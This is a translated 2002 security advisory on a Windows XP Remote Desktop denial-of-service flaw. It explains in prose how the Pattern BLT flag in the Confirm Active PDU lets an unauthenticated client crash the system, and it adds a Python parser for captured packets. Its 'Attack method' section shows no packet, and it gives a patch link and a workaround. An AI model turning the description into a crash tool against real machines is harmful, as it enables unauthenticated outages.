Microsoft Windows XP Remote Desktop DoS Flaw

Microsoft Windows XP Remote Desktop DoS flaw (MS, patch)

Affected program:
Windows XP Professional Remote Desktop

Description:

Microsoft Windows XP Remote Desktop DoS flaw

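Details:

Remote Desktop is the single-user Remote Desktop Protocol (RDP) service in Windows XP Professional. When Remote Desktop (that is, Terminal Services) is enabled on Windows XP Professional, the system is easily subjected to a remote denial-of-service attack.

When an RDP session starts, the client and server negotiate graphics-handling capabilities. The session packets that are sent include a data unit called PDU Confirm Active, and this data unit contains a 32-byte block that lets the client set options to turn off the "drawing" commands the program does not support.

What matters here is whether the Pattern BLT command is sent. On Windows 2000 Server, turning this command off makes the server send bitmaps commands in place of Pattern BLT commands. But when the Pattern BLT command is submitted to Windows XP Professional, it can cause Windows XP Professional to crash and reboot. Because the crash occurs while the login screen is performing its pattern-fill drawing, an attacker needs no login or authentication to carry out the denial-of-service attack from a client. Testing shows that all versions of the RDP protocol (RDP 4.0, 5.0 and 5.1) are affected by this flaw.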
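
Added example (not part of the original advisory): a parser that walks the capability sets taken from a captured, unencrypted Confirm Active PDU and reports which drawing commands (called "orders" in the RDP specification) the client has switched off in the 32-byte block. The field offsets follow the Order Capability Set layout in Microsoft's published RDP specification (MS-RDPBCGR); the function names and the sample bytes are constructed for illustration.

```python
import struct

CAPSTYPE_ORDER = 0x0003      # Order Capability Set type
ORDER_SUPPORT_OFFSET = 36    # 4-byte header + 32 bytes of preceding fields
ORDER_SUPPORT_LEN = 32       # the 32-byte block the advisory refers to
# First orderSupport indices as named in MS-RDPBCGR.
ORDER_NAMES = {0: "DstBlt", 1: "PatBlt", 2: "ScrBlt", 3: "MemBlt", 4: "Mem3Blt"}

def iter_capability_sets(blob):
    """Yield (type, raw_set) for each capability set in blob."""
    pos = 0
    while pos + 4 <= len(blob):
        cap_type, cap_len = struct.unpack_from("<HH", blob, pos)
        # The length includes the header; reject values that loop or overrun.
        if cap_len < 4 or pos + cap_len > len(blob):
            raise ValueError(f"bad capability length {cap_len} at offset {pos}")
        yield cap_type, blob[pos:pos + cap_len]
        pos += cap_len
    if pos != len(blob):
        raise ValueError("trailing bytes after last capability set")

def order_support(blob):
    """Return the 32-byte orderSupport array, or None if no Order set exists."""
    for cap_type, cap in iter_capability_sets(blob):
        if cap_type == CAPSTYPE_ORDER:
            end = ORDER_SUPPORT_OFFSET + ORDER_SUPPORT_LEN
            if len(cap) < end:
                raise ValueError("Order capability set too short")
            return cap[ORDER_SUPPORT_OFFSET:end]
    return None

def disabled_orders(blob):
    """Names of the known drawing orders the client has switched off."""
    support = order_support(blob)
    if support is None:
        return None
    return [name for idx, name in ORDER_NAMES.items() if support[idx] == 0]

def build_sample(support):
    # Constructed sample: an 8-byte stub set followed by an 88-byte Order set.
    order = struct.pack("<HH", CAPSTYPE_ORDER, 88) + bytes(32) + support + bytes(20)
    return struct.pack("<HH", 0x0001, 8) + bytes(4) + order

if __name__ == "__main__":
    sample = build_sample(bytes([1, 0, 1, 1, 0]) + bytes(27))
    print(disabled_orders(sample))
```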

Affected systems:
Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Unaffected systems:
Microsoft Windows 2000 Server


Attack method:

Sending the following unencrypted, oversized PDU Confirm Active packet can crash the Windows XP Professional Remote Desktop system:




Solution:

Download the patch:

http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/default.asp


Temporary workaround:

* Disable the Remote Desktop service:

Control Panel --> System --> Remote --> Remote Desktop --> clear the option "Allow users to connect remotely to this computer"


Additional information:


Related sites:
http://www.net-security.org/vuln.php?id=2058


Copyright by 「黑白网络工作室」 2002. All Rights Reserved.